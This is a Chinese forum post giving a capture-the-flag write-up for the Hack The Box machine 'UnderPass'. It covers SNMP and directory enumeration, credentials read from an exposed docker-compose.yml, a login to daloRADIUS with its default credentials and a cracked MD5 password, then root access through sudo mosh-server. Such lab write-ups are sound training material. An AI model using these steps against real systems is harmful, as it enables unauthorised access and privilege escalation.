登录/ 注册
 找回密码
 立即注册
关闭

CSDN热搜

程序园 精品问答 技术交流 资源下载
返回列表 发新帖
首页 业界区 科技 HTB-UnderPass

HTB-UnderPass

桂册 6 天前
该靶机nmap扫描udp发现161端口snmp服务,利用snmpwalk扫描得到目录信息,使用dirsearch扫描得到一个yml文件,存放数据库账号密码,记录下来,此时需要登录口,使用字典扫描拼接/app目录,得到登录界面,利用版本号搜索默认凭证,找到一个用户,MD5解密hex值,ssh登录,sudo -l 发现mosh,查找利用方式,设置环境变量,然后执行登录
一台现役靶机
1.png

一、信息收集

靶机ip:10.10.11.48
攻击机ip:10.10.16.26
nmap扫描,发现服务是Apache/2.4.52 (Ubuntu)
2.png

先设置域名解析
  1. echo "10.10.11.48 underpass.htb" |sudo tee -a /etc/hosts
复制代码
3.png

执行UDP扫描
  1. nmap -sU -sV -Pn 10.10.11.48
复制代码
得到的信息如下,开着snmp服务
  1. PORT     STATE         SERVICE
  2. 161/udp  open          snmp
  3. 1812/udp open|filtered radius
  4. 1813/udp open|filtered radacct
复制代码
目录扫描

没有泄露目录
4.png

子域名扫描

利用ffuf扫描均未发现可用信息
  1. ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt:FUZZ -u "http://underpass.htb/FUZZ" -ic
  2. ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:FFUZ -H "Host: FFUZ.underpass.htb" -u http://underpass.htb -fw 20
复制代码
没有可用信息
5.png

二、边界突破

访问80端口,是一个apache2的配置信息,ubuntu系统
6.png

这里查看源码以及指纹信息均未发现泄露的信息,只能重新扫描靶机了
使用snmpwalk执行扫描,关键信息:daloradius
7.png

猜测其是目录,拼接进行扫描
8.png

目录如下
  1. /daloradius/.gitignore   
  2. /daloradius/app
  3. /daloradius/ChangeLog                             
  4. /daloradius/doc  ->  http://10.10.11.48/daloradius/doc/
  5. /daloradius/Dockerfile                           
  6. /daloradius/docker-compose.yml                    
  7. /daloradius/library  ->  http://10.10.11.48/daloradius/library/
  8. /daloradius/LICENSE                              
  9. /daloradius/README.md                             
  10. /daloradius/setup  ->  http://10.10.11.48/daloradius/setup/
复制代码
访问第一个目录,发现一个配置文件,但是无法访问
9.png

docker-compose.yml   文件里发现数据库的账户密码
10.png

如下,这个时候应该找找有没有登录点,这几个目录均没有,重新扫描/app目录
  1. database:radius
  2. user:radius
  3. passswd:radiusdbpw
复制代码
扫出来一个登录界面
  1. daloradius/app/users/login.php
复制代码
11.png

一个登录界面,使用上面的账户密码不成功
12.png

换一个字典重新扫描,得到一个新目录
  1. dirsearch -u http://10.10.11.48/daloradius/app/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e*
  2. http://10.10.11.48/daloradius/app/operators/login.php
复制代码
一个登录界面,先尝试上面的账户密码不成功,发现下面有版本号
13.png

发现默认用户名administrator和密码radius
14.png

成功登录
15.png

在config里有个语言可以修改,先换成中文
16.png

发现一个用户名和密码
17.png

如下
  1. 用户名:svcMosh
  2. 密码:412DD4759978ACFCC81DEAB01B382403
复制代码
在该网站识别,拿到密码:underwaterfriends
18.png

ssh连接
19.png

三、权限提升

user.txt

该目录下存放user.txt,成功查看
20.png

root.txt

sudo -l查看,发现一处可执行路径
  1. /usr/bin/mosh-server
复制代码
21.png

执行一下看看,看不懂
22.png

查看suid
23.png

查找上面发现的可执行路径,参考文章
  1. https://www.cnblogs.com/sunweiye/p/12003616.html
复制代码
方法如下
24.png

重新查看
25.png

找到上面的密钥:NnSZo0rz1vdi7bRzX4Hn4g
  1. export MOSH_KEY=NnSZo0rz1vdi7bRzX4Hn4g
  2. mosh-client 127.0.0.1 60001 #这里应该连接的是靶机ip,因为是在靶机里执行,直接连接其本地ip
复制代码
成功登录,拿到root.txt
26.png

结束
27.png

四、总结

snmpwalk扫描:
dirsearch字典扫描:
mosh登录:

来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

使用道具 举报
相关推荐
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册
发帖
桂册
6 天前

0

粉丝关注

11

主题发布

板块介绍填写区域,请于后台编辑
微信扫一扫